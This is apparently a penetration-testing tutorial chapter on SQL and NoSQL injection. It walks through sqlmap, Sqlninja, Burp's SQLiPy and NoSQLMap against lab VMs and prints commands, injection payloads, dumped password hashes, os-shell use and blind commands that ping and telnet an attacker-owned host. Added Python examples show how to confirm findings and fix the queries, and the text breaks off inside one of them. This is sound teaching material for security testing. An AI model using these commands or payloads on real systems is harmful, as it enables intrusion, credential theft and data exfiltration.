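run_scan(SqlmapApi("http://172.16.151.128:8083"), url, post_data, cookie) with the request details Burp captured is the equivalent of pressing “Start Scan” in the SQLiPy tab; pass the same URL/data/cookie you would paste there. 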

Burp and SQLMap LAB: 

To demonstrate how to use Burp and SQLMap, we can run a quick demo with the OWASPBWA VM we 
configured at the beginning. Once loaded, visit [ip]/webgoat.net/Content/SQLInjection.aspx and 
proxy through the Burp tool like we had done with our prior Burp example. 


[Screenshot, Iceweasel at http://172.16.151.144/webgoat.net/Content/SQLInjection.aspx: the 
WebGoat.NET “Injection Attacks - Exploiting SQL Injection” page, with an “Employee Email” search 
box (“Enter the first few letters of their first or last name”) and a results table of firstName, 
lastName and email, e.g. Leslie Thompson, lthompson@webgoatcoins.com.] 


WebGoat Vulnerable Application 


Make a couple quick searches while proxy’ed through Burp Proxy Pro. In the HTTP history tab, you 
should see the POST request created by the application. Right-click on any request that we want to 
test and run SQLiPy Scan. 











[Screenshot, Burp Proxy -> HTTP history: the POST /webgoat.net/Content/SQLInjection.aspx request 
to 172.16.151.144 (status 200) is selected; the right-click context menu shows the usual Send to 
Spider/Intruder/Repeater/Sequencer/Comparer/Decoder entries plus the extension entries “Send to 
SQLMapper”, “Send to CeWLer” and “SQLiPy Scan”.] 


Burp - SQLiPy Scan 


For the first time, we will have to input the SQLMap API IP and Port. We can also select what type 
of data we want to pull. 


[Screenshot, SQLiPy’s SQLMap Scanner tab populated from the request: SQLMap API IP 
172.16.151.128, SQLMap API Port, URL http://172.16.151.144:80/webgoat.net/Content/SQLInjection.aspx, 
the POST data (including ctl00$BodyContentPlaceholder$txtName and __VIEWSTATE), the 
ASP.NET_SessionId cookie, Referer and User-Agent, then the options: Test Parameter(s), Text Only, 
Level 3, Risk 1, Param Pollution, Current User, Current DB, Hostname, Is DBA?, List Users, List 
Passwords, List Privs, List Roles, List DBs.] 


Burp - SQLMap Scanner Injection 


If an SQL Injection is successful, the Scanner tab will light up and have a new finding called 
“SQLMap Scan Finding.” By clicking on this, we will be able to get information about the current 
DB, Hostname, Users, Passwords and databases. 


[Screenshot, Burp Scanner -> Results for http://172.16.151.144: “SQLMap Scan Finding” alongside 
“Email addresses disclosed” and “Path-relative style sheet import”. The Advisory pane lists Password 
Hashes per User:] 

• wackopicko 
• *5FA5F4C9ACD2CA5C1EB9E0EC80175D5FCAA0D7D6 
• root 
• *73316569DAC7839C2A784FF263F5C0ABBC7086E2 
• kbloom 
• *10A99DBC0772291AA6AF9A1A9271945340E4E812 
• stealth 
• *0F44FA14B9DFBBFFBDF2F7692868DE1B997C66ED 
• sendmail 
• M7A91042510E7E966EF4075A934A77A57A9E71FE 
• webcal 
• *E2E1F0A3459647AACF63319694BCBD107231B10C 
• citizens 
• *E0E85D302E82538A1FDA46B453F687F3964A99B4 
• yazd10 
• *30B462BE16C04867D06113304F664BB9A5B573D8 
• sqlol 
• *1DB6D61428C07B8E8D6876CC60ECAD01D2CE844A 

SQLMap Results 


As you can see above, we didn’t need to remember any switches or parameters, but we were still 
able to dump the database. This makes SQL injections much quicker and leverages an easy-to-use 
GUI panel. 


Manual SQL Injection 


SQLmap (http://sqlmap.org/) (Kali Linux) 

The command line version has all the same functionality as through Burp. In the following examples, I 
will show both a GET parameter and a POST parameter example with SQLmap, since they are the 
most commonly identified types of SQLi. The reason I show both HTTP method attacks is because if 
you don't have the request properly configured, it is very likely the attack will fail. 


Here is a look at the help file for SQLmap. There are a lot of different switches that can be used for 
SQLi attacks: sqlmap -h. 


Enumeration: 
These options can be used to enumerate the back-end database 
management system information, structure and data contained in the 
tables. Moreover you can run your own SQL statements 

  -a, --all           Retrieve everything 
  -b, --banner        Retrieve DBMS banner 
  --current-user      Retrieve DBMS current user 
  --current-db        Retrieve DBMS current database 
  --passwords         Enumerate DBMS users password hashes 
  --tables            Enumerate DBMS database tables 
  --columns           Enumerate DBMS database table columns 
  --schema            Enumerate DBMS schema 
  --dump              Dump DBMS database table entries 
  --dump-all          Dump all DBMS databases tables entries 
  -D DB               DBMS database to enumerate 
  -T TBL              DBMS database table to enumerate 
  -C COL              DBMS database table column to enumerate 

Operating system access: 
These options can be used to access the back-end database management 
system underlying operating system 

  --os-shell          Prompt for an interactive operating system shell 
  --os-pwn            Prompt for an OOB shell, meterpreter or VNC 

General: 
These options can be used to set some general working parameters 

  --batch             Never ask for user input, use the default behaviour 
  --flush-session     Flush session files for current target 

Miscellaneous: 
  --wizard            Simple wizard interface for beginner users 

[!] to see full list of options run with '-hh' 

[*] shutting down at 19:53:25 

root@kali:~# sqlmap -h 


SQLMap Help Information 


GET Parameter Example 

In the following examples, we are going to assume that the GET parameter is where the SQLi 
vulnerability is located with the URL. We want to test every parameter and make sure that the SQLi 
vulnerability is really a finding. There are a good number of false positives I have seen with scanner 
tools, so validation is really the only method for ensuring the findings. Remember that if you do not 
specify a value to test, SQLmap will test every parameter by default. 


• Here is an example command to identify if an SQL injection vulnerability using the 
banner switch: 

• cd /opt/sqlmap 

• python ./sqlmap.py-u "http://site.com/info.php?user=test&pass=test" -b 


For example, we will attack our vulnerable virtual machine (OWASPBWA): 

• python ./sqlmap.py -u "http://192.168.1.124/mutillidae/index.php?page=user-info.php&username=asdf&password=sdf&user-info-php-submit-button=View+Account+Details" -b 




Type: UNION query 
Title: MySQL UNION query (NULL) - 5 columns 
Payload: page=user-info.php&username=asdf' UNION ALL SELECT NUL... 
...php-submit-button=View Account Details 

[18:28:41] [INFO] the back-end DBMS is MySQL 
[18:28:41] [WARNING] reflective value(s) found and filtering out 
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx) 
web application technology: PHP 5.3.2, Apache 2.2.14 
back-end DBMS operating system: Linux Ubuntu 
back-end DBMS: MySQL 5.0.12 
banner: '5.1.41-3ubuntu12.6-log' 

[*] shutting down at 18:28:41 

:/opt/sqlmap# python ./sqlmap.py -u "http://192.168.1.124/mutillidae/index.php?page=user-info.php&username=asdf&password=sdf&user-info-php-submit-button=View+Account+Details" -b 


SQLMap Results 


Retrieving the database username: 

• python ./sqlmap.py -u "http://site.com/info.php?user=test&pass=test" --current-user 

Interactive shell: 

• python ./sqlmap.py -u "http://site.com/info.php?user=test&pass=test" --os-shell 

Some hints and tricks: 

• You might need to define which type of database to attack. If you think an injection 
is possible, but SQLmap is not finding the issue, try setting the --dbms=[database type] 
flag. 

• If you need to test an authenticated SQL injection finding, log into the website via a 
browser and grab the Cookie (you can grab it straight from Burp Suite). Then, define 
the cookie using the --cookie=[COOKIE] switch. 

• Stuck? Try the command: sqlmap --wizard 
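To make the validation point concrete, here is an added example (my own code, not from the book and not part of sqlmap) that models an injectable "user-info" lookup against an in-memory SQLite table filled with constructed rows, and confirms the finding the way a manual boolean-based check does: a true condition must reproduce the baseline response and a false condition must change it. A scanner hit that fails that pair is a false positive. The accounts table, its rows and the AND 1=1 / AND 1=2 probes are assumptions for illustration; the parameterised lookup alongside shows why the same probes fail once the query is fixed.

```python
import sqlite3

# Constructed sample database (not the OWASPBWA/Mutillidae schema): enough to
# model the lookup that sqlmap was pointed at above.
_db = sqlite3.connect(":memory:")
_db.executescript("""
CREATE TABLE accounts(username TEXT, password TEXT, signature TEXT);
INSERT INTO accounts VALUES ('admin', 'adminpass', 'Monkey!');
INSERT INTO accounts VALUES ('asdf',  'sdf',       'test user');
""")


def vulnerable_lookup(username):
    """Models the injectable query: user input is spliced into the SQL text."""
    sql = "SELECT username, signature FROM accounts WHERE username = '%s'" % username
    return _db.execute(sql).fetchall()


def safe_lookup(username):
    """Same query with a bound parameter: the input can never change the SQL."""
    sql = "SELECT username, signature FROM accounts WHERE username = ?"
    return _db.execute(sql, (username,)).fetchall()


def confirm_boolean_sqli(lookup, baseline):
    """Manual confirmation of a reported injection. The true probe must give
    the baseline response and the false probe must give something else; if
    either fails, the parameter is not (or not usably) injectable."""
    normal = lookup(baseline)
    true_case = lookup(baseline + "' AND 1=1 --")
    false_case = lookup(baseline + "' AND 1=2 --")
    return true_case == normal and false_case != normal
```

Pick a baseline value that actually returns data (an existing username); with an empty baseline response both probes return nothing and the check correctly reports no confirmation. Against `safe_lookup` the probe strings are compared as literal usernames, so the true probe no longer matches the baseline and the check returns False.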


POST Parameter Example 

POST examples are going to mimic GET injections, except for how the vulnerable parameter is 
passed. Instead of being in the URL, the POST parameters are passed in the data section. This is 
normally seen with username and passwords since the web servers generally log GET parameters 
and you wouldn't want the web server to log passwords. Also, there are size limitations with GET 
methods and, therefore, a lot of data will be passed via POST parameters for larger applications. 


Determining if an SQL injection is valid (the result will be the banner if valid): 

• python ./sqlmap.py -u "http://site.com/info.php" --data="user=test&pass=test" -b 

For example, we will attack our vulnerable virtual machine (OWASPBWA): 

• python ./sqlmap.py -u "http://192.168.1.124/mutillidae/index.php?page=login.php" --data="username=asdf&password=adsf&login-php-submit-button=Login" -b 





Type: UNION query 
Title: MySQL UNION query (NULL) - 5 columns 
Payload: username=asdf' UNION ALL SELECT NULL,NULL,NULL,CONCAT(... 
...454a,0x716b7a7671),NULL#&password=adsf&login-php-submit-button=Logi... 

[18:51:27] [INFO] the back-end DBMS is MySQL 
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx) 
web application technology: PHP 5.3.2, Apache 2.2.14 
back-end DBMS operating system: Linux Ubuntu 
back-end DBMS: MySQL 5.0.12 
banner: '5.1.41-3ubuntu12.6-log' 

[*] shutting down at 18:51:27 

:/opt/sqlmap# python ./sqlmap.py -u "http://192.168.1.124/mutillidae/index.php?page=login.php" --data="username=asdf&password=adsf&login-php-submit-button=Login" -b 


SQLMap Banner 


Retrieving the database username: 

• python ./sqlmap.py -u "http://site.com/info.php" --data="user=test&pass=test" --current-user 

Interactive shell: 

• python ./sqlmap.py -u "http://site.com/info.php" --data="user=test&pass=test" --os-shell 


If you are able to gain access to an os-shell, you will have command line access under the account 
the database server runs as (or, with sqlmap's web-stager method, the account the web server runs 
as). In the following example, I was able to find a vulnerable SQLi, gain an os-shell, and run an 
ipconfig command. 


os-shell> ipconfig 
do you want to retrieve the command standard output? [Y/n/a] 
command standard output: 
(Windows ipconfig output for two adapters: Connection-specific DNS Suffix, IP Address, Subnet Mask 
and Default Gateway; addresses shown include 10.2.136.1, 10.2.130.1 and 10.2.130.2) 

SQLMap Command Shell 

I recommend spending some time getting used to running different SQLi commands and trying 
different switches identified in the help file. If SQLmap fails, it might be your configuration, so make 
sure you try using the Wizard setup, also. 


Sqlninja 

(http://sqlninja.sourceforge.net/) (Kali Linux) 


Sqlninja is another great SQL injection tool for uploading shells and evading network IDS systems 
against MSSQL databases. You might be asking: Why would I use Sqlninja if I have already become 
comfortable with SQLmap? From many years of experience, I have seen a large number of tests that 
identify SQLi with only one tool or the other. This might be due to a number of factors such as how it 
detects blind SQLi, how they upload binaries, how IPS signatures might detect one tool or the other, 
or how they handle cookies. There are so many different variables, and it would be smart to always 
double-check your work. 

Taking a look at the help file with the -h switch, we can see all the different functionality Sqlninja 
has: 


root@kali:~# sqlninja -h 
Unknown option: h 
Usage: /usr/bin/sqlninja 
  -m <mode> : Required. Available modes are: 
    t/test        - test whether the injection is working 
    f/fingerprint - fingerprint user, xp_cmdshell and more 
    b/bruteforce  - bruteforce sa account 
    e/escalation  - add user to sysadmin server role 
    x/resurrectxp - try to recreate xp_cmdshell 
    u/upload      - upload a .scr file 
    s/dirshell    - start a direct shell 
    k/backscan    - look for an open outbound port 
    r/revshell    - start a reverse shell 
    d/dnstunnel   - attempt a dns tunneled shell 
    i/icmpshell   - start a reverse ICMP shell 
    c/sqlcmd      - issue a 'blind' OS command 
    m/metasploit  - wrapper to Metasploit stagers 
  -f <file> : configuration file (default: sqlninja.conf) 
  -p <password> : sa password 
  -w <wordlist> : wordlist to use in bruteforce mode (dictionary method only) 
  -g : generate debug script and exit (only valid in upload mode) 
  -v : verbose output 
  -d <mode> : activate debug 
    1   - print each injected command 
    2   - print each raw HTTP request 
    3   - print each raw HTTP response 
    all - all of the above 
...see sqlninja-howto.html for details 

Sqlninja Help Page 


The only issue I have had with Sqlninja is that the configuration file is a bit more difficult to set up 
and I have never found great or easy-to-read documentation. So I will give two examples that mirror 
the SQLmap ones above. 




In Sqlninja, you need to mark the vulnerable parameter to inject into with the __SQL2INJECT__ 
string. This is different from SQLmap, where we did not need to specify which field to test 
against. Let's go through a couple of examples, since that should make things much clearer. Before we 
can use Sqlninja, we need to write the Sqlninja configuration file. This contains all the information 
about the URL, the HTTP method, session cookies, and the browser user agent. 


Let me show you the easiest way to obtain the information required for Sqlninja. As before, load up 
the Burp Suite and turn the proxy intercept on the request where the vulnerable field is passed. In the 
following example, we are going to capture requests sent to /wfLogin.aspx and identify the POST 
parameter values. This is going to have most of the information required for Sqlninja injections, but 
slight modifications will need to be made from the Burp Raw request. 


Let's take a look at one of the requests from Burp that identified a potential SQLi vulnerability: 


POST /wfLogin.aspx HTTP/1.1 
Host: site.com 
User-Agent: Mozilla/5.0 (X11; U; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.7,it;q=0.3 
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 
Referer: http://fakewebsite.com/wfLogin.aspx 
Cookie: ASP.NET_SessionId=3owsdevpwyrbjv45hltc4i45 
Connection: keep-alive 
Content-Type: application/x-www-form-urlencoded 
Cookie: ASPSESSIONID=3dkDjb3jasfwefJGd 
Content-Length: 367 

Loginpanel%3AtxtUserName=admin&Loginpanel%3AtxtPassword=admin&Loginpanel%3AbtnLogin=Login 

Burp Request Example 


In the next two examples, you will see how the most common GET and POST parameters are created. 
This can be used for any different type of HTTP method, but usually the POST and GET methods will 
be used. 

A few things to notice from the original Burp request versus how it will be entered in the Sqlninja 
configuration file are: 

• The HTTP Method (GET/POST) needs to be modified to include the full URL. Burp 
is missing the http://site.com in front of /wfLogin.aspx 

• You have to define which parameters to fuzz by adding the __SQL2INJECT__ 
string. 

• Sometimes for Sqlninja, you may need to try the attack by first closing the 
vulnerable SQL parameter. This can be done with ticks, quotes, or semi-colons. 


GET Parameter Example 

We are going to write the sql_get.conf configuration file to our Kali desktop with two vulnerable 
parameters. Sqlninja will try to attack both the user and pass fields and try to validate if they are 
vulnerable. To create/modify the configuration file in a terminal, type: 

• gedit ~/Desktop/sql_get.conf 

• Enter the following into the configuration file and save it: 

--httprequeststart-- 
GET http://site.com/wfLogin.aspx?user=test';__SQL2INJECT__&pass=test';__SQL2INJECT__ HTTP/1.0 
Host: site.com 
User-Agent: Mozilla/5.0 (X11; U; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8 
Accept: text/xml, application/xml, text/html; q=0.9, text/plain; q=0.8, image/png, */* 
Accept-Language: en-us, en; q=0.7, it;q=0.3 
Accept-Charset: ISO-8859-15, utf-8; q=0.7,*;q=0.7 
Content-Type: application/x-www-form-urlencoded 
Cookie: ASPSESSIONID=3dkDjb3jasfiveGGd 
Connection: close 
--httprequestend-- 


POST Parameter Example 

A POST request differs from a GET in that the parameters are passed in the data section instead of 
being part of the URL. In a terminal, we need to create the configuration file and modify the 
parameters to inject into. In this example, we will inject into both the username and password: 

• gedit ~/Desktop/sql_post.conf 

• Enter the following into the configuration file and save it: 

--httprequeststart-- 
POST http://site.com/wflogin.aspx HTTP/1.0 
Host: site.com 
User-Agent: Mozilla/5.0 (X11; U; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8 
Accept: text/xml, application/xml, text/html; q=0.9, text/plain; q=0.8, image/png, */* 
Accept-Language: en-us, en; q=0.7, it;q=0.3 
Accept-Charset: ISO-8859-15, utf-8; q=0.7,*;q=0.7 
Content-Type: application/x-www-form-urlencoded 
Cookie: ASPSESSIONID=3dkDjb3jasfrveffGd 
Connection: close 

username=test';__SQL2INJECT__&password=test';__SQL2INJECT__ 
--httprequestend-- 


Executing Sqlninja 

Whether you use a GET or POST method attack, executing your attack will be the same. Now that we 
have created a configuration file, we can use the following command to run Sqlninja: 

• sqlninja -m t -f ~/Desktop/sql_get.conf 

This command tells Sqlninja to run in test mode (-m t) to see whether the injection works with the 
configuration file we just created. If you are lucky and do find a valid SQL injection, you can start to 
attack the database. In the following example, we switch to fingerprint mode (-m f) to find the 
version, check to see if we are the "sa" account (which has administrative privileges), and see if we have 
access to a shell. 



:/usr/bin# sqlninja -f sqlninja.conf -m f 
Sqlninja rel. 0.2.6-r1 
Copyright (C) 2006-2011 icesurfer <r00t@northernfo... 
[+] Parsing sqlninja.conf... 
[+] Target is: ... 
What do you want to discover ? 
  0 - Database version (2000/2005/2008) 
  1 - Database user 
  2 - Database user rights 
  3 - Whether xp_cmdshell is working 
  4 - Whether mixed or Windows-only authentication 
  5 - Whether SQL Server runs as System 
      (xp_cmdshell must be available) 
  6 - Current database name 
  a - All of the above 
  h - Print this menu 
  q - exit 
> 0 
[+] Checking SQL Server version... 
    Target: Microsoft SQL Server 2000 
> 1 
[+] Checking whether we are sysadmin... 
    We seem to be 'sa' :) 
> 6 
[+] Finding Current DB length... 
    Got it ! Length = 0 
[+] Now going for the characters... 
    Current DB is....: 
> 3 
[+] Checking whether xp_cmdshell is available 
    xp_cmdshell seems to be available :) 

Sqlninja Example 


Once we have xp_cmdshell available, we want to test that we have command line access and what 
privileges we have. In the example below we are exploiting the SQLi vulnerability and 
testing command line commands. 

During this specific test (image below), it looks like we might be running commands on the server, 
but we would need to validate this. The issue is that after setting up a listener on a server we 
own on the Internet, we are not seeing any connections from the compromised server 
outbound. This would be a problem if we wanted to exfiltrate data back to us or download additional 
tooling. Since the command console created by Sqlninja's blind command mode does not show the 
responses from commands, we need another way to validate that our commands are actually executing. 

The best way to check if a command is working is by putting tcpdump to listen for pings on a server 
we own, which is publicly available on the Internet. By running ping commands on a compromised 
server, we can easily validate if our server is responding to pings. The reason we use pings is 
because ICMP is generally allowed outbound and is less likely to trigger IDS/IPS signatures. This 
can be configured with the following command on an external server owned by the attacker: 

• tcpdump -nnvXSs 0 -c2 icmp 


This command will log any pings sent to my server, which will allow me to validate that the server 
can talk outbound and that my commands are working. On my compromised SQLi host, I execute a 
simple ping back to my server. If it is successful, tcpdump will see the ICMP request. 


Blind command execution through the SQLi can be run with the following command (c is the sqlcmd mode 
from the help page above): 

• sqlninja -f [configuration file] -m c 

As we can see in the image below, I first tried to run telnet commands back to my server, but that was 
unsuccessful. I then tried ping commands back to my server, where tcpdump was listening. 
In this case the pings arrived, which proved I could run full commands on this host, even though the 
host does not appear to have TCP access back out to my server. 

In the image below, the top portion is my server logging pings and the bottom is the victim host, 
which is vulnerable to SQLi. Although the telnet commands seem to fail, the pings are successful. 



# tcpdump -nnvXSs 0 -c2 icmp 
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes 
04:47:52.375099 IP (tos 0x0, ttl 113, id 3934, offset 0, flags [none], proto ICMP (1), length 60) 
    [victim] > [attacker]: ICMP echo request, id 512, seq 9605, length 40 
    0x0000:  4500 003c ...                                E..<.... 
    0x0010:  ... 6162 6364                                ....abcd 
    0x0020:  6566 6768 696a 6b6c 6d6e 6f70 7172 7374      efghijklmnopqrst 
    0x0030:  7576 7761 6263 6465 6667 6869                uvwabcdefghi 
04:47:52.375175 IP (tos 0x0, ttl 64, id ..., offset 0, flags [none], proto ICMP (1), length 60) 
    [attacker] > [victim]: ICMP echo reply, id 512, seq 9605, length 40 
    0x0000:  4500 003c ...                                E..<.... 
    0x0010:  ... 6162 6364                                ....abcd 
    0x0020:  6566 6768 696a 6b6c 6d6e 6f70 7172 7374      efghijklmnopqrst 
    0x0030:  7576 7761 6263 6465 6667 6869                uvwabcdefghi 
2 packets captured 
2 packets received by filter 
0 packets dropped by kernel 

~/sql/sqlninja-0.2.999-alpha1# sudo ./sqlninja -f sql.conf ... 
Sqlninja rel. 0.2.999-alpha1 <http://sqlninja.sf.net> 
(C) 2006-2013 icesurfer & nico 
[+] Parsing sql.conf... 
[+] Loading extraction module: lib/getdata_time.pl 
[+] Port 80. Assuming cleartext 
[+] Target is: ... 
[+] Starting blind command mode. Use "exit" to be dropped back to your shell. 
> telnet internet-scan.com 999 
[+] Command has been sent and executed 
> telnet internet-scan.com 999 
[+] Command has been sent and executed 
> ping internet-scan.com 
[+] Command has been sent and executed 

Sqlninja Command Injection Ping 
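The tcpdump output above carries more evidence than "a ping arrived": the 32-byte payload abcdefghijklmnopqrstuvwabcdefghi is what the Windows ping.exe sends, which is consistent with the MSSQL host. Here is an added example (my own code, not from the book, and not a Sqlninja feature) that decodes raw IPv4/ICMP echo requests the way tcpdump does, verifies both checksums, and filters a capture down to the callbacks from the host we told to ping us. The packets are constructed inline for the demonstration; the IP addresses, id/seq values and the 0x1234 IP identification are assumptions. A practitioner would feed it frames from a raw socket or a saved capture instead of the builder.

```python
import struct
import ipaddress

# Payload that Windows ping.exe puts in every echo request (constructed here).
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"


def checksum(data):
    """RFC 1071 one's-complement sum, used by both the IPv4 and ICMP headers."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_request(src, dst, ident, seq, payload):
    """Assemble an IPv4 packet carrying an ICMP echo request (test input only)."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, ident, seq) + payload       # type 8 = echo request
    icmp = icmp[:2] + struct.pack("!H", checksum(icmp)) + icmp[4:]
    total_len = 20 + len(icmp)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0x1234, 0, 113, 1, 0,
                     ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + icmp


def decode_echo_request(packet):
    """Return (src, dst, id, seq, payload) for a well-formed echo request, else None."""
    if len(packet) < 28 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    if checksum(packet[:ihl]) != 0 or packet[9] != 1:     # bad header checksum or not ICMP
        return None
    icmp = packet[ihl:]
    if checksum(icmp) != 0:                               # ICMP checksum covers header+payload
        return None
    icmp_type, _code, _csum, ident, seq = struct.unpack("!BBHHH", icmp[:8])
    if icmp_type != 8:
        return None
    src = str(ipaddress.IPv4Address(packet[12:16]))
    dst = str(ipaddress.IPv4Address(packet[16:20]))
    return src, dst, ident, seq, icmp[8:]


def callbacks_from(packets, expected_src):
    """Keep only echo requests from the host we told to ping us, tagging the
    ones whose payload matches Windows ping.exe."""
    hits = []
    for pkt in packets:
        decoded = decode_echo_request(pkt)
        if decoded and decoded[0] == expected_src:
            hits.append({"id": decoded[2], "seq": decoded[3],
                         "windows_ping": decoded[4] == WINDOWS_PING_PAYLOAD})
    return hits
```

Filtering on the source address matters on an Internet-facing listener, which sees background ICMP all day; the -c2 in the tcpdump command stops after two packets, so a stray probe could otherwise be mistaken for the callback.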




If you have gotten this far and you aren't sure what to do next, you can jump to the Lateral Pass 
section to get an idea on next steps. This should give you enough details to help you start testing and 
practicing on vulnerable frameworks. Of course, these are the best scenario options, where the SQLi 
works without having to configure detailed settings about the database type, blind SQLi type, or other 
timing type issues. 


NoSQL Database Injections 

More and more, I am coming across NoSQL type databases on my penetration tests. If you aren't 
familiar with NoSQL, try to build out a database and interact with it. The major difference between 
the two types of databases is that a regular SQL database is structured and relational, while a 
NoSQL database is based more on key/value pairs or documents, allowing you to store any type of data. This is 
a very high-level explanation, and it takes a little time to understand when NoSQL databases are more 
beneficial than traditional relational databases. 

The two common types of NoSQL databases I come across are CouchDB and MongoDB. There has 
always been a consensus that SQL injections do not work on NoSQL databases. This isn't completely 
true. While many of the normal SQL injection attacks do not work in their current fashion, it is still 
possible to accomplish many of the same goals. This is best demonstrated through the following 
example. In the next lab example, we will build a MongoDB server and vulnerable application. 


LAB: 


• git clone https://github.com/tcstool/NoSQLMap.git /opt/NoSQLMap 

• git clone https://github.com/cheetz/NoSQL_Test.git /opt/NoSQL_Test 

• apt-get install php5-dev php-pear 

• pear install -f pecl/mongo 

• pecl install mongo 

• pecl install apc 

• gedit /etc/php5/apache2/php.ini 

o add the following to the php.ini file: 
o extension=mongo.so 

• service apache2 start 

• gedit /etc/mongodb.conf 

o Edit bind_ip to listen on any interface: 
o bind_ip = 0.0.0.0 

• mkdir /var/www/vuln_apps 

• mv /opt/NoSQL_Test/userdata.php /var/www/vuln_apps 

• service apache2 restart && service mongodb restart 

Note that bind_ip = 0.0.0.0 with no authentication configured exposes the database to anyone who can 
reach the VM (this is exactly what NoSQLMap's anonymous MongoDB access scan looks for), so keep this 
lab on an isolated network. 


Next, we need to populate the MongoDB database. In a terminal window type: 

• mongo 

o use appUserData 
o db.createCollection("users") 
o show collections 

o db.users.insert({"name":"james","username":"james","email":"james... 
o db.users.insert({"name":"frank","username":"frank","email":"frank@... 
o db.users.insert({"name":"paul","username":"paul","email":"paul@su... 


If everything worked out, it should look like this when you query a user: 



User Profile Lookup 
192.168.199.128/vuln_apps/userdata.php?usersearch=paul 

function () { var query = 'paul'; return this.username == query;} 
1 user found. 

Name: paul 
Username: paul 
Email: paul@suck.testlab 

Enter your username: [paul] [Submit] 

Sample Vulnerable NoSQL Application 


If you see this, that’s great! You have a MongoDB installation and webpage utilizing that backend 
NoSQL database. Now, we want to see if we can attack this MongoDB installation. In the following 
example, we are going to use a tool called NoSQLMap. 


root@kali:/opt/NoSQLMap# python nosqlmap.py 

NoSQLMap-v0.5 
nosqlmap@gmail.com 

1-Set options 
2-NoSQL DB Access Attacks 
3-NoSQL Web App attacks 
Scan for Anonymous MongoDB Access 
Change Platform (Current: MongoDB) 
Exit 

Select an option: 

NoSQLMap 


We need to execute the nosqlmap.py script and set the vulnerable IP and GET parameters. 


Attacking MongoDB : 

• cd /opt/NoSQLMap 

• python nosqlmap.py 

• 1 - Set Options 

o Set the target host IP (your Mongo IP) 

o Set App Path to: /vuln_apps/userdata.php?usersearch=paul&submitbutton=Submit 

o Set my local MongoDB IP (your host) 
o b - Save option file 
o x - Exit 


We have now set the configuration of the vulnerable site, so let’s attack the web application that uses 
a MongoDB backend: 

• 3-NoSQL Web App attacks 

• Baseline test-Enter random string size: 5 

• 1-Alphanumeric 

• 1-usersearch 

NoSQLMap is taking each variable in the GET parameter and testing common NoSQL injection 
techniques. If everything is successful, you will see something like the following: 



Test 8: PHP/ExpressJS > Undefined Injection 
Injection failed. 

Start timing based tests (y/n)? y 

Starting Javascript string escape time based injection... 
HTTP load time variance was 30.0 seconds! Injection possible. 
Starting Javascript integer escape time based injection... 
HTTP load time variance was only 0.6 seconds. Injection probabl... 
MongoDB < 2.4 detected. Start brute forcing database info (y/n)? 

Vulnerable URLs: 
http://192.168.199.128:80/vuln_apps/userdata.php?usersearch=a'; return db.a.find(); var dummy='!&submitbutton=Submit 
http://192.168.199.128:80/vuln_apps/userdata.php?usersearch=a'; return this.a != 'WC4Uo'; var dummy='!&submitbutton=Submit 

Possibly vulnerable URLs: 
http://192.168.199.128:80/vuln_apps/userdata.php?usersearch=...); var dummy=1&submitbutton=Submit 
http://192.168.199.128:80/vuln_apps/userdata.php?usersearch=...One(); var dummy='!&submitbutton=Submit 
http://192.168.199.128:80/vuln_apps/userdata.php?usersearch=...ne(); var dummy=1&submitbutton=Submit 
http://192.168.199.128:80/vuln_apps/userdata.php?usersearch=...C4Uo; var dummy=1&submitbutton=Submit 

Timing based attacks: 
String attack - Successful 
Integer attack - unsuccessful 
Save results to file (y/n)? 

NoSQLMap - Scanner Results 

Right away, NoSQLMap identified two URLs that are vulnerable. Browsing those URLs, we see that 
the variable usersearch is vulnerable and that we can inject NoSQL commands into that GET 
parameter. 


• http://192.168.199.128:80/vuln_apps/userdata.php?usersearch=a'; return db.a.find(); var dummy='!&submitbutton=Submit 

Running that query in a browser, we get back every document in the collection, which is the equivalent of 
a select * from users; in SQL. 


...userdata.php?usersearch=a'; return db.a.find(); var dummy='!&submitbutton=Submit 

function () { var query = 'a'; return db.a.find(); var dummy='!'; return 
this.username == query;} 

3 user found. 

Name: james 
Username: james 
Email: james@suck.testlab 

Name: frank 
Username: frank 
Email: frank@suck.testlab 

Name: paul 
Username: paul 
Email: paul@suck.testlab 

Enter your username: [Search] [Submit] 

NoSQL Injection 


We have just dumped that Collection and dumped all the users. Although many people have stated that 
traditional SQL injection attacks do not work on noSQL databases, this is only partly true. The 
concept for SQL injection attacks against NoSQL technologies is still sound, regardless of database 
syntax. 
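The page echoes the $where function it builds, which makes the mechanism easy to see: the usersearch value is pasted into a JavaScript string literal, and a value containing a quote closes that literal and adds statements that MongoDB then executes for every document. As an added example (my own code, not the lab's userdata.php and not part of NoSQLMap), here is a small Python model of the vulnerable construction, a lexer that tracks the string literal and reports which statements the input added, and the equality filter that is the actual fix. The WHERE_TEMPLATE string is taken from the function echoed in the screenshots; the rest is an assumption for illustration.

```python
# The $where function the vulnerable page builds, as echoed in the screenshots.
WHERE_TEMPLATE = "function () { var query = '%s'; return this.username == query;}"


def vulnerable_where(usersearch):
    """Builds the $where clause the way the lab page does: by pasting the GET
    parameter into a JavaScript string literal. MongoDB runs the result once
    per document, so any statements the input adds run server-side."""
    return WHERE_TEMPLATE % usersearch


def safe_filter(usersearch):
    """The fix: an equality filter. The value is data, never JavaScript, so
    quotes and semicolons in it mean nothing to the server."""
    return {"username": usersearch}


def split_statements(js):
    """Minimal JavaScript-ish lexer: split the function source on ';' while
    tracking single-quoted string literals (with backslash escapes), so a ';'
    inside a literal is not counted as a statement boundary."""
    stmts, cur, in_str, i = [], [], False, 0
    while i < len(js):
        ch = js[i]
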